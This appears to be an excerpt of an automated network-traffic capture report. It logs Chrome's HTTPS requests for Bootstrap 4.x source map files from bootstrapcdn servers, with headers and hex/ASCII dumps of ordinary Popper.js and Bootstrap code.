                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 68 74 27 20 3f 20 27 54 6f 70 27 20 3a 20 27 4c 65 66 74 27 7d 60 5d 20 2b 5c 6e 20 20 20 20 20 20 20 20 63 6f 6d 70 75 74 65 64 53 74 79 6c 65 5b 60 6d 61 72 67 69 6e 24 7b 61 78 69 73 20 3d 3d 3d 20 27 48 65 69 67 68 74 27 20 3f 20 27 42 6f 74 74 6f 6d 27 20 3a 20 27 52 69 67 68 74 27 7d 60 5d 5c 6e 20 20 20 20 20 20 3a 20 30 5c 6e 20 20 29 3b 5c 6e 7d 5c 6e 5c 6e 65 78 70 6f 72 74 20 64 65 66 61 75 6c 74 20 66 75 6e 63 74 69 6f 6e 20 67 65 74 57 69 6e 64 6f 77 53 69 7a 65 73 28 29 20 7b 5c 6e 20 20 63 6f 6e 73 74 20 62 6f 64 79 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 5c 6e 20 20 63 6f 6e 73 74 20 68 74 6d 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 5c 6e 20 20 63 6f 6e 73 74 20 63 6f 6d 70 75 74 65
                                                                                                                  Data Ascii: ht' ? 'Top' : 'Left'}`] +\n computedStyle[`margin${axis === 'Height' ? 'Bottom' : 'Right'}`]\n : 0\n );\n}\n\nexport default function getWindowSizes() {\n const body = document.body;\n const html = document.documentElement;\n const compute
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 20 64 6f 6e 27 74 20 61 73 6b 2c 20 74 68 65 20 65 6c 65 6d 65 6e 74 20 69 73 6e 27 74 5c 6e 20 20 2f 2f 20 63 6f 6e 73 69 64 65 72 65 64 20 69 6e 20 44 4f 4d 20 69 6e 20 73 6f 6d 65 20 63 69 72 63 75 6d 73 74 61 6e 63 65 73 2e 2e 2e 5c 6e 20 20 2f 2f 20 54 68 69 73 20 69 73 6e 27 74 20 72 65 70 72 6f 64 75 63 69 62 6c 65 20 69 6e 20 49 45 31 30 20 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 20 6d 6f 64 65 20 6f 66 20 49 45 31 31 5c 6e 20 20 69 66 20 28 69 73 49 45 31 30 28 29 29 20 7b 5c 6e 20 20 20 20 74 72 79 20 7b 5c 6e 20 20 20 20 20 20 72 65 63 74 20 3d 20 65 6c 65 6d 65 6e 74 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 5c 6e 20 20 20 20 20 20 63 6f 6e 73 74 20 73 63 72 6f 6c 6c 54 6f 70 20 3d 20 67 65 74 53 63 72 6f 6c 6c
                                                                                                                  Data Ascii: don't ask, the element isn't\n // considered in DOM in some circumstances...\n // This isn't reproducible in IE10 compatibility mode of IE11\n if (isIE10()) {\n try {\n rect = element.getBoundingClientRect();\n const scrollTop = getScroll


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  38192.168.2.1649766104.18.11.2074432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:36 UTC382OUTGET /bootstrap/4.0.0/js/bootstrap.min.js.map HTTP/1.1
                                                                                                                  Host: maxcdn.bootstrapcdn.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:36 UTC939INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:36 GMT
                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  CDN-PullZone: 252412
                                                                                                                  CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                  CDN-RequestCountryCode: US
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Cache-Control: public, max-age=31919000
                                                                                                                  ETag: W/"331c9bac5363b904ceb0955e418ee135"
                                                                                                                  Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                                                                  CDN-ProxyVer: 1.04
                                                                                                                  CDN-RequestPullSuccess: True
                                                                                                                  CDN-RequestPullCode: 200
                                                                                                                  CDN-CachedAt: 03/11/2024 06:24:33
                                                                                                                  CDN-EdgeStorageId: 1070
                                                                                                                  timing-allow-origin: *
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  CDN-Status: 200
                                                                                                                  CDN-RequestId: 3036c3ef88102f9a1ebe456134aaf44c
                                                                                                                  CDN-Cache: HIT
                                                                                                                  CF-Cache-Status: HIT
                                                                                                                  Age: 58994
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f742ef63ab8-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:36 UTC430INData Raw: 37 63 30 38 0d 0a 7b 22 76 65 72 73 69 6f 6e 22 3a 33 2c 22 73 6f 75 72 63 65 73 22 3a 5b 22 2e 2e 2f 2e 2e 2f 72 6f 6c 6c 75 70 50 6c 75 67 69 6e 42 61 62 65 6c 48 65 6c 70 65 72 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 75 74 69 6c 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 61 6c 65 72 74 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 62 75 74 74 6f 6e 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 63 61 72 6f 75 73 65 6c 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 63 6f 6c 6c 61 70 73 65 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 64 72 6f 70 64 6f 77 6e 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 6d 6f 64 61 6c 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 74
                                                                                                                  Data Ascii: 7c08{"version":3,"sources":["../../rollupPluginBabelHelpers","../../js/src/util.js","../../js/src/alert.js","../../js/src/button.js","../../js/src/carousel.js","../../js/src/collapse.js","../../js/src/dropdown.js","../../js/src/modal.js","../../js/src/t
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 63 72 69 70 74 6f 72 22 2c 22 65 6e 75 6d 65 72 61 62 6c 65 22 2c 22 63 6f 6e 66 69 67 75 72 61 62 6c 65 22 2c 22 77 72 69 74 61 62 6c 65 22 2c 22 4f 62 6a 65 63 74 22 2c 22 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 22 2c 22 6b 65 79 22 2c 22 5f 63 72 65 61 74 65 43 6c 61 73 73 22 2c 22 43 6f 6e 73 74 72 75 63 74 6f 72 22 2c 22 70 72 6f 74 6f 50 72 6f 70 73 22 2c 22 73 74 61 74 69 63 50 72 6f 70 73 22 2c 22 70 72 6f 74 6f 74 79 70 65 22 2c 22 5f 65 78 74 65 6e 64 73 22 2c 22 61 73 73 69 67 6e 22 2c 22 61 72 67 75 6d 65 6e 74 73 22 2c 22 73 6f 75 72 63 65 22 2c 22 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 22 2c 22 63 61 6c 6c 22 2c 22 61 70 70 6c 79 22 2c 22 74 68 69 73 22 2c 22 24 22 2c 22 4e 41 4d 45 22 2c 22 44 41 54 41 5f 4b 45 59 22 2c 22 45 56 45 4e
                                                                                                                  Data Ascii: criptor","enumerable","configurable","writable","Object","defineProperty","key","_createClass","Constructor","protoProps","staticProps","prototype","_extends","assign","arguments","source","hasOwnProperty","call","apply","this","$","NAME","DATA_KEY","EVEN
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 6e 67 65 45 76 65 6e 74 22 2c 22 61 64 64 41 72 69 61 50 72 65 73 73 65 64 22 2c 22 69 6e 70 75 74 22 2c 22 74 79 70 65 22 2c 22 63 68 65 63 6b 65 64 22 2c 22 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 22 2c 22 68 61 73 41 74 74 72 69 62 75 74 65 22 2c 22 63 6c 61 73 73 4c 69 73 74 22 2c 22 63 6f 6e 74 61 69 6e 73 22 2c 22 66 6f 63 75 73 22 2c 22 73 65 74 41 74 74 72 69 62 75 74 65 22 2c 22 74 6f 67 67 6c 65 43 6c 61 73 73 22 2c 22 62 75 74 74 6f 6e 22 2c 22 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 22 2c 22 43 61 72 6f 75 73 65 6c 22 2c 22 44 65 66 61 75 6c 74 22 2c 22 44 65 66 61 75 6c 74 54 79 70 65 22 2c 22 44 69 72 65 63 74 69 6f 6e 22 2c 22 5f 69 74 65 6d 73 22 2c 22 5f 69 6e 74 65 72 76 61 6c 22 2c 22 5f 61 63 74 69 76 65 45 6c 65 6d 65
                                                                                                                  Data Ascii: ngeEvent","addAriaPressed","input","type","checked","activeElement","hasAttribute","classList","contains","focus","setAttribute","toggleClass","button","FOCUS_BLUR_DATA_API","Carousel","Default","DefaultType","Direction","_items","_interval","_activeEleme
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 22 2c 22 44 41 54 41 5f 54 4f 47 47 4c 45 22 2c 22 65 6c 65 6d 22 2c 22 66 69 6c 74 65 72 22 2c 22 5f 73 65 6c 65 63 74 6f 72 22 2c 22 70 75 73 68 22 2c 22 5f 70 61 72 65 6e 74 22 2c 22 5f 67 65 74 50 61 72 65 6e 74 22 2c 22 5f 61 64 64 41 72 69 61 41 6e 64 43 6f 6c 6c 61 70 73 65 64 43 6c 61 73 73 22 2c 22 68 69 64 65 22 2c 22 73 68 6f 77 22 2c 22 61 63 74 69 76 65 73 22 2c 22 61 63 74 69 76 65 73 44 61 74 61 22 2c 22 41 43 54 49 56 45 53 22 2c 22 6e 6f 74 22 2c 22 73 74 61 72 74 45 76 65 6e 74 22 2c 22 53 48 4f 57 22 2c 22 64 69 6d 65 6e 73 69 6f 6e 22 2c 22 5f 67 65 74 44 69 6d 65 6e 73 69 6f 6e 22 2c 22 73 74 79 6c 65 22 2c 22 61 74 74 72 22 2c 22 73 65 74 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 22 2c 22 63 6f 6d 70 6c 65 74 65 22 2c 22 53 48 4f 57 4e
                                                                                                                  Data Ascii: ","DATA_TOGGLE","elem","filter","_selector","push","_parent","_getParent","_addAriaAndCollapsedClass","hide","show","actives","activesData","ACTIVES","not","startEvent","SHOW","dimension","_getDimension","style","attr","setTransitioning","complete","SHOWN
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 22 2c 22 61 70 70 65 6e 64 43 68 69 6c 64 22 2c 22 64 69 73 70 6c 61 79 22 2c 22 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 22 2c 22 73 63 72 6f 6c 6c 54 6f 70 22 2c 22 5f 65 6e 66 6f 72 63 65 46 6f 63 75 73 22 2c 22 73 68 6f 77 6e 45 76 65 6e 74 22 2c 22 74 72 61 6e 73 69 74 69 6f 6e 43 6f 6d 70 6c 65 74 65 22 2c 22 5f 74 68 69 73 34 22 2c 22 68 61 73 22 2c 22 4b 45 59 44 4f 57 4e 5f 44 49 53 4d 49 53 53 22 2c 22 52 45 53 49 5a 45 22 2c 22 5f 74 68 69 73 36 22 2c 22 5f 72 65 73 65 74 41 64 6a 75 73 74 6d 65 6e 74 73 22 2c 22 5f 72 65 73 65 74 53 63 72 6f 6c 6c 62 61 72 22 2c 22 5f 74 68 69 73 37 22 2c 22 5f 72 65 6d 6f 76 65 42 61 63 6b 64 72 6f 70 22 2c 22 63 61 6c 6c 62 61 63 6b 22 2c 22 61 6e 69 6d 61 74 65 22 2c 22 62 61 63 6b 64 72 6f 70 22 2c 22
                                                                                                                  Data Ascii: ","appendChild","display","removeAttribute","scrollTop","_enforceFocus","shownEvent","transitionComplete","_this4","has","KEYDOWN_DISMISS","RESIZE","_this6","_resetAdjustments","_resetScrollbar","_this7","_removeBackdrop","callback","animate","backdrop","
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 6e 64 22 2c 22 74 65 78 74 22 2c 22 74 69 74 6c 65 22 2c 22 73 70 6c 69 74 22 2c 22 66 6f 72 45 61 63 68 22 2c 22 65 76 65 6e 74 49 6e 22 2c 22 65 76 65 6e 74 4f 75 74 22 2c 22 46 4f 43 55 53 4f 55 54 22 2c 22 5f 66 69 78 54 69 74 6c 65 22 2c 22 74 69 74 6c 65 54 79 70 65 22 2c 22 64 65 6c 61 79 22 2c 22 74 61 62 43 6c 61 73 73 22 2c 22 6a 6f 69 6e 22 2c 22 69 6e 69 74 43 6f 6e 66 69 67 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 50 6f 70 6f 76 65 72 22 2c 22 73 75 62 43 6c 61 73 73 22 2c 22 73 75 70 65 72 43 6c 61 73 73 22 2c 22 63 72 65 61 74 65 22 2c 22 5f 5f 70 72 6f 74 6f 5f 5f 22 2c 22 5f 67 65 74 43 6f 6e 74 65 6e 74 22 2c 22 53 63 72 6f 6c 6c 53 70 79 22 2c 22 4f 66 66 73 65 74 4d 65 74 68 6f 64 22 2c 22 5f 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 22 2c 22
                                                                                                                  Data Ascii: nd","text","title","split","forEach","eventIn","eventOut","FOCUSOUT","_fixTitle","titleType","delay","tabClass","join","initConfigAnimation","Popover","subClass","superClass","create","__proto__","_getContent","ScrollSpy","OffsetMethod","_scrollElement","
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 2c 4b 41 41 4f 53 2c 45 41 43 56 58 2c 4f 41 41 4f 4f 2c 55 41 41 55 4b 2c 65 41 41 65 43 2c 4b 41 41 4b 46 2c 45 41 41 51 54 2c 4b 41 43 2f 43 56 2c 45 41 41 4f 55 2c 47 41 41 4f 53 2c 45 41 41 4f 54 2c 49 41 4b 33 42 2c 4f 41 41 4f 56 2c 49 41 47 4f 73 42 2c 4d 41 41 4d 43 2c 4b 41 41 4d 4c 2c 71 47 43 78 42 39 42 2c 49 43 43 67 42 4d 2c 45 41 4f 52 43 2c 45 41 45 41 43 2c 45 41 43 41 43 2c 45 41 45 41 43 2c 45 41 4f 41 43 2c 45 41 4d 41 43 2c 45 41 41 41 41 2c 45 41 41 41 41 2c 45 41 59 41 43 2c 45 43 74 43 53 50 2c 45 41 4f 54 43 2c 45 41 45 41 43 2c 45 41 43 41 43 2c 45 41 43 41 4b 2c 45 41 43 41 4a 2c 45 41 45 41 45 2c 45 41 41 41 41 2c 45 41 41 41 41 2c 45 41 4d 41 47 2c 45 41 41 41 41 2c 45 41 41 41 41 2c 45 41 41 41 41 2c 45 41 41 41 41 2c 45 41
                                                                                                                  Data Ascii: ,KAAOS,EACVX,OAAOO,UAAUK,eAAeC,KAAKF,EAAQT,KAC/CV,EAAOU,GAAOS,EAAOT,IAK3B,OAAOV,IAGOsB,MAAMC,KAAML,qGCxB9B,ICCgBM,EAORC,EAEAC,EACAC,EAEAC,EAOAC,EAMAC,EAAAA,EAAAA,EAYAC,ECtCSP,EAOTC,EAEAC,EACAC,EACAK,EACAJ,EAEAE,EAAAA,EAAAA,EAMAG,EAAAA,EAAAA,EAAAA,EAAAA,EA
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 2f 44 2c 61 41 43 64 36 44 2c 45 41 41 4d 47 2c 55 41 41 55 43 2c 51 41 41 51 6c 45 2c 4d 41 41 4d 43 2c 4b 41 41 4d 4c 2c 63 41 38 48 35 43 69 42 2c 45 41 70 4a 4b 2c 43 41 71 4a 58 58 2c 47 43 70 4a 47 4f 2c 47 41 4f 45 4e 2c 45 41 41 73 42 2c 51 41 47 74 42 45 2c 45 41 41 41 41 2c 4b 41 44 41 44 2c 45 41 41 73 42 2c 59 41 47 74 42 45 2c 47 41 5a 51 4a 2c 45 41 77 4b 62 41 2c 47 41 35 4a 36 42 79 44 2c 47 41 41 47 78 44 2c 47 41 4f 33 42 49 2c 69 42 41 43 71 42 46 2c 6b 42 41 43 43 41 2c 79 42 41 43 44 41 2c 45 41 58 43 2c 61 41 63 74 42 47 2c 45 41 43 49 2c 51 41 44 4a 41 2c 45 41 45 49 2c 4f 41 46 4a 41 2c 45 41 47 49 2c 4f 41 53 4a 43 2c 77 42 41 43 51 6b 42 2c 51 41 43 4c 77 43 2c 53 41 41 57 78 43 2c 36 42 41 57 6c 42 79 43 2c 4d 41 6c 44 6b 42 2c
                                                                                                                  Data Ascii: /D,aACd6D,EAAMG,UAAUC,QAAQlE,MAAMC,KAAML,cA8H5CiB,EApJK,CAqJXX,GCpJGO,GAOEN,EAAsB,QAGtBE,EAAAA,KADAD,EAAsB,YAGtBE,GAZQJ,EAwKbA,GA5J6ByD,GAAGxD,GAO3BI,iBACqBF,kBACCA,yBACDA,EAXC,aActBG,EACI,QADJA,EAEI,OAFJA,EAGI,OASJC,wBACQkB,QACLwC,SAAWxC,6BAWlByC,MAlDkB,
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 42 4a 2c 47 41 5a 53 4a 2c 45 41 6d 4b 64 41 2c 47 41 76 4a 36 42 79 44 2c 47 41 41 47 78 44 2c 47 41 45 33 42 4b 2c 45 41 43 4b 2c 53 41 44 4c 41 2c 45 41 45 4b 2c 4d 41 46 4c 41 2c 45 41 47 4b 2c 51 41 47 4c 47 2c 45 41 43 69 42 2c 30 42 41 44 6a 42 41 2c 45 41 45 69 42 2c 30 42 41 46 6a 42 41 2c 45 41 47 69 42 2c 51 41 48 6a 42 41 2c 45 41 49 69 42 2c 55 41 4a 6a 42 41 2c 45 41 4b 69 42 2c 4f 41 47 6a 42 4a 2c 30 42 41 43 30 42 46 2c 45 41 41 59 4b 2c 73 42 41 43 70 42 2c 51 41 41 51 4c 2c 45 41 41 59 4b 2c 45 41 41 70 42 2c 51 41 43 53 4c 2c 45 41 41 59 4b 2c 47 41 53 76 43 45 2c 77 42 41 43 51 65 2c 51 41 43 4c 77 43 2c 53 41 41 57 78 43 2c 36 42 41 57 6c 42 73 45 2c 4f 41 72 44 6d 42 2c 65 41 73 44 62 43 2c 47 41 41 71 42 2c 45 41 43 72 42 43 2c 47
                                                                                                                  Data Ascii: BJ,GAZSJ,EAmKdA,GAvJ6ByD,GAAGxD,GAE3BK,EACK,SADLA,EAEK,MAFLA,EAGK,QAGLG,EACiB,0BADjBA,EAEiB,0BAFjBA,EAGiB,QAHjBA,EAIiB,UAJjBA,EAKiB,OAGjBJ,0BAC0BF,EAAYK,sBACpB,QAAQL,EAAYK,EAApB,QACSL,EAAYK,GASvCE,wBACQe,QACLwC,SAAWxC,6BAWlBsE,OArDmB,eAsDbC,GAAqB,EACrBC,G
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 42 2c 49 41 43 76 42 2b 43 2c 47 41 41 47 78 44 2c 47 41 41 4d 36 46 2c 57 41 41 61 2c 6f 42 41 43 70 42 72 43 2c 47 41 41 47 78 44 2c 47 41 41 51 47 2c 45 41 43 4e 4d 2c 45 41 41 4f 32 45 2c 6b 42 41 47 54 33 45 2c 47 43 6a 4b 48 6f 47 2c 45 41 41 59 2c 53 41 41 43 39 47 2c 4f 41 4f 58 43 2c 45 41 41 79 42 2c 57 41 45 7a 42 43 2c 45 41 41 79 42 2c 63 41 43 7a 42 43 2c 45 41 41 41 41 2c 49 41 41 36 42 44 2c 45 41 45 37 42 45 2c 45 41 41 79 42 4a 2c 45 41 41 45 79 44 2c 47 41 41 47 78 44 2c 47 41 4d 39 42 38 47 2c 59 41 43 4f 2c 63 41 43 41 2c 53 41 43 41 2c 51 41 43 41 2c 63 41 43 41 2c 47 41 47 50 43 2c 59 41 43 4f 2c 34 42 41 43 41 2c 67 42 41 43 41 2c 79 42 41 43 41 2c 77 42 41 43 41 2c 57 41 47 50 43 2c 45 41 43 4f 2c 4f 41 44 50 41 2c 45 41 45 4f 2c
                                                                                                                  Data Ascii: B,IACvB+C,GAAGxD,GAAM6F,WAAa,oBACpBrC,GAAGxD,GAAQG,EACNM,EAAO2E,kBAGT3E,GCjKHoG,EAAY,SAAC9G,OAOXC,EAAyB,WAEzBC,EAAyB,cACzBC,EAAAA,IAA6BD,EAE7BE,EAAyBJ,EAAEyD,GAAGxD,GAM9B8G,YACO,cACA,SACA,QACA,cACA,GAGPC,YACO,4BACA,gBACA,yBACA,wBACA,WAGPC,EACO,OADPA,EAEO,


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  39192.168.2.1649767104.18.11.2074432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:36 UTC385OUTGET /bootstrap/4.1.3/js/bootstrap.min.js.map HTTP/1.1
                                                                                                                  Host: stackpath.bootstrapcdn.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:37 UTC940INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:36 GMT
                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  CDN-PullZone: 252412
                                                                                                                  CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                  CDN-RequestCountryCode: US
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Cache-Control: public, max-age=31919000
                                                                                                                  ETag: W/"2fc279b4cd4ace33a72aa2ae05a83704"
                                                                                                                  Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
                                                                                                                  CDN-ProxyVer: 1.04
                                                                                                                  CDN-RequestPullSuccess: True
                                                                                                                  CDN-RequestPullCode: 200
                                                                                                                  CDN-CachedAt: 03/10/2024 20:03:41
                                                                                                                  CDN-EdgeStorageId: 1029
                                                                                                                  timing-allow-origin: *
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  CDN-Status: 200
                                                                                                                  CDN-RequestId: 84683084cfb675e42f0152060f8cd803
                                                                                                                  CDN-Cache: HIT
                                                                                                                  CF-Cache-Status: HIT
                                                                                                                  Age: 488121
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f76e9b24858-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:37 UTC429INData Raw: 37 63 30 36 0d 0a 7b 22 76 65 72 73 69 6f 6e 22 3a 33 2c 22 73 6f 75 72 63 65 73 22 3a 5b 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 75 74 69 6c 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 61 6c 65 72 74 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 62 75 74 74 6f 6e 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 63 61 72 6f 75 73 65 6c 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 63 6f 6c 6c 61 70 73 65 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 64 72 6f 70 64 6f 77 6e 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 6d 6f 64 61 6c 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 74 6f 6f 6c 74 69 70 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 6a 73 2f 73 72 63 2f 70 6f 70 6f 76 65 72 2e
                                                                                                                  Data Ascii: 7c06{"version":3,"sources":["../../js/src/util.js","../../js/src/alert.js","../../js/src/button.js","../../js/src/carousel.js","../../js/src/collapse.js","../../js/src/dropdown.js","../../js/src/modal.js","../../js/src/tooltip.js","../../js/src/popover.
                                                                                                                  2024-10-22 14:08:37 UTC1369INData Raw: 54 41 5f 41 50 49 5f 4b 45 59 22 2c 22 53 65 6c 65 63 74 6f 72 22 2c 22 42 75 74 74 6f 6e 22 2c 22 44 65 66 61 75 6c 74 22 2c 22 44 65 66 61 75 6c 74 54 79 70 65 22 2c 22 44 69 72 65 63 74 69 6f 6e 22 2c 22 43 61 72 6f 75 73 65 6c 22 2c 22 44 69 6d 65 6e 73 69 6f 6e 22 2c 22 43 6f 6c 6c 61 70 73 65 22 2c 22 52 45 47 45 58 50 5f 4b 45 59 44 4f 57 4e 22 2c 22 41 74 74 61 63 68 6d 65 6e 74 4d 61 70 22 2c 22 44 72 6f 70 64 6f 77 6e 22 2c 22 4d 6f 64 61 6c 22 2c 22 43 4c 41 53 53 5f 50 52 45 46 49 58 22 2c 22 42 53 43 4c 53 5f 50 52 45 46 49 58 5f 52 45 47 45 58 22 2c 22 48 6f 76 65 72 53 74 61 74 65 22 2c 22 54 72 69 67 67 65 72 22 2c 22 54 6f 6f 6c 74 69 70 22 2c 22 50 6f 70 6f 76 65 72 22 2c 22 4f 66 66 73 65 74 4d 65 74 68 6f 64 22 2c 22 53 63 72 6f 6c 6c
                                                                                                                  Data Ascii: TA_API_KEY","Selector","Button","Default","DefaultType","Direction","Carousel","Dimension","Collapse","REGEXP_KEYDOWN","AttachmentMap","Dropdown","Modal","CLASS_PREFIX","BSCLS_PREFIX_REGEX","HoverState","Trigger","Tooltip","Popover","OffsetMethod","Scroll
                                                                                                                  2024-10-22 14:08:37 UTC1369INData Raw: 24 65 6c 65 6d 65 6e 74 22 2c 22 64 61 74 61 22 2c 22 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 22 2c 22 61 6c 65 72 74 49 6e 73 74 61 6e 63 65 22 2c 22 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 22 2c 22 5f 63 72 65 61 74 65 43 6c 61 73 73 22 2c 22 6b 65 79 22 2c 22 67 65 74 22 2c 22 6f 6e 22 2c 22 43 6f 6e 73 74 72 75 63 74 6f 72 22 2c 22 6e 6f 43 6f 6e 66 6c 69 63 74 22 2c 22 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 22 2c 22 74 6f 67 67 6c 65 22 2c 22 74 72 69 67 67 65 72 43 68 61 6e 67 65 45 76 65 6e 74 22 2c 22 61 64 64 41 72 69 61 50 72 65 73 73 65 64 22 2c 22 69 6e 70 75 74 22 2c 22 74 79 70 65 22 2c 22 63 68 65 63 6b 65 64 22 2c 22 63 6c 61 73 73 4c 69 73 74 22 2c 22 63 6f 6e 74 61 69 6e 73 22 2c 22 61 63 74 69 76 65 45 6c 65 6d 65
                                                                                                                  Data Ascii: $element","data","_handleDismiss","alertInstance","preventDefault","_createClass","key","get","on","Constructor","noConflict","FOCUS_BLUR_DATA_API","toggle","triggerChangeEvent","addAriaPressed","input","type","checked","classList","contains","activeEleme
                                                                                                                  2024-10-22 14:08:37 UTC1369INData Raw: 22 6c 65 6e 22 2c 22 24 63 61 72 6f 75 73 65 6c 22 2c 22 53 48 4f 57 22 2c 22 53 48 4f 57 4e 22 2c 22 48 49 44 45 22 2c 22 48 49 44 44 45 4e 22 2c 22 5f 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 22 2c 22 5f 74 72 69 67 67 65 72 41 72 72 61 79 22 2c 22 6d 61 6b 65 41 72 72 61 79 22 2c 22 69 64 22 2c 22 74 6f 67 67 6c 65 4c 69 73 74 22 2c 22 65 6c 65 6d 22 2c 22 66 69 6c 74 65 72 45 6c 65 6d 65 6e 74 22 2c 22 66 69 6c 74 65 72 22 2c 22 66 6f 75 6e 64 45 6c 65 6d 22 2c 22 5f 73 65 6c 65 63 74 6f 72 22 2c 22 70 75 73 68 22 2c 22 5f 70 61 72 65 6e 74 22 2c 22 5f 67 65 74 50 61 72 65 6e 74 22 2c 22 5f 61 64 64 41 72 69 61 41 6e 64 43 6f 6c 6c 61 70 73 65 64 43 6c 61 73 73 22 2c 22 68 69 64 65 22 2c 22 73 68 6f 77 22 2c 22 61 63 74 69 76 65 73 22 2c 22 61 63
                                                                                                                  Data Ascii: "len","$carousel","SHOW","SHOWN","HIDE","HIDDEN","_isTransitioning","_triggerArray","makeArray","id","toggleList","elem","filterElement","filter","foundElem","_selector","push","_parent","_getParent","_addAriaAndCollapsedClass","hide","show","actives","ac
